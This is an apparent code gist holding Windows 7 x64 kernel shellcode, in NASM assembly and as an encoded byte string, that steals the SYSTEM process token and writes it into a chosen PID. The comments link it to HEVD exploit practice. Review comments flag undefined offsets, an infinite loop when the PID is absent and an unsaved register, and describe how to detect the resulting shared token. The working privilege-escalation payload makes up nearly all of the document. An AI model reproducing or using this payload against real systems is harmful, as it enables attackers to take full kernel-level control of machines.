@achilles4828
Created June 4, 2020 06:28
Windows 7 x64 Token Stealing Shellcode Stub with custom PID
[BITS 64]
; Compiled via NASM
; based on http://mcdermottcybersecurity.com/articles/x64-kernel-privilege-escalation
;-----------------------------------------------------------------------
; Kernel-mode (ring 0) token-replacement stub, 64-bit, Intel/NASM syntax.
;
; What the code below does:
;   1. Reads the current thread from the processor control block via gs:,
;      then the owning _EPROCESS, then its ActiveProcessLinks entry.
;   2. Walks ActiveProcessLinks until UniqueProcessId == SYSTEM_PID and
;      loads that process's Token field (low 4 bits masked off).
;   3. Keeps walking until UniqueProcessId == USER_PID and stores the
;      saved Token value into that process's Token field.
;   4. Unwinds 28h bytes of stack and returns.
;
; NOTE(review): KTHREAD_OFFSET, EPROCESS_OFFSET, FLINK_OFFSET, TOKEN,
; SYSTEM_PID and USER_PID are referenced but never defined in this
; listing, so it does not assemble as shown. They are structure offsets
; and ids tied to one specific kernel build (the title says Windows 7
; x64); nothing here adapts to other builds.
;
; Register roles: rcx = list cursor (address of an ActiveProcessLinks
; entry, so [rcx - 8] is the field immediately before it); rdx = pid
; scratch; rax = token value carried from SYSTEM to the target;
; r11/r12 = temporaries used only during the initial chain of loads.
; Clobbers: rax, rcx, rdx, r11, r12, flags. r12 is a non-volatile
; register under the Windows x64 ABI and is not saved or restored here.
;
; Termination: each loop exits only on an exact pid match; if the
; requested pid is absent the loop never ends (presumably the list is
; circular, so it spins rather than faulting - confirm against the
; kernel build).
;
; Detection note: the persistent artifact of this stub is two _EPROCESS
; records whose Token fields resolve to the same token object, i.e. a
; non-SYSTEM process whose token pointer equals SYSTEM's. That is the
; condition a kernel-integrity check or memory-forensics pass should
; look for; no user-mode API call is involved, so the stub itself only
; becomes visible through whatever kernel read/write primitive reached
; it.
;-----------------------------------------------------------------------
start:
mov rdx, [gs:KTHREAD_OFFSET] ; nt!_KPCR -> PrcbData -> CurrentThread
mov r11, [rdx + EPROCESS_OFFSET] ; nt!_KTHREAD -> APCState -> Process
mov r12, [r11 + FLINK_OFFSET] ; nt!_EPROCESS -> ActiveProcessLinks[0] -> Flink
mov rcx, [r12] ; Follow link into first process
get_system:
; Loop invariant: rcx points at some process's ActiveProcessLinks entry.
mov rdx, [rcx - 8 ] ; Offset above ActiveProcessLinks -> UniqueProcessID
cmp rdx, SYSTEM_PID ; Are you system? No? Carry on!
jz get_system_token
mov rcx, [rcx] ; load next entry using the follow link
jmp get_system
get_system_token:
mov rax, [rcx + TOKEN] ; Copy SYSTEM process nt!_EPROCESS -> Token
and al, 0f0h ; Clear low 4 bits due to Windows policy
; NOTE(review): the "policy" above presumably refers to the Token field
; being a tagged pointer whose low bits are not part of the address;
; the mask keeps only the pointer portion. Confirm against the build.
get_pid_process:
; Same walk again, starting from the SYSTEM entry, now looking for USER_PID.
mov rdx, [rcx - 8] ; Offset above ActiveProcessLinks -> UniqueProcessID
cmp rdx, USER_PID ; PPPP (placeholder)
jz get_process_token
mov rcx, [rcx] ; load next entry using the follow link
jmp get_pid_process
get_process_token:
mov[rcx + TOKEN], rax ; Copy token of system to current process
; stack alignment
; NOTE(review): the 28h unwind is tied to the specific call path that
; reached this stub (the comment names HEVD); it is not a generic epilogue.
add rsp, 28h ; HEVD offset (later)
ret
;"\x65\x48\x8B\x14\x25\x88\x01\x00\x00\x4C\x8B\x42\x70\x4D\x8B\x88"
;"\x88\x01\x00\x00\x49\x8B\x09\x48\x8B\x51\xF8\x48\x83\xFA\x04\x74"
;"\x05\x48\x8B\x09\xEB\xF1\x48\x8B\x81\x80\x00\x00\x00\x24\xF0\x48"
;"\x8B\x51\xF8\x48\x81\xFA\xPP\xPP\xPP\xPP\x74\x05\x48\x8B\x09\xEB"
;"\xEE\x48\x89\x81\x80\x00\x00\x00\x48\x83\xC4\x28\xC3"
;Input PID in place of \xPP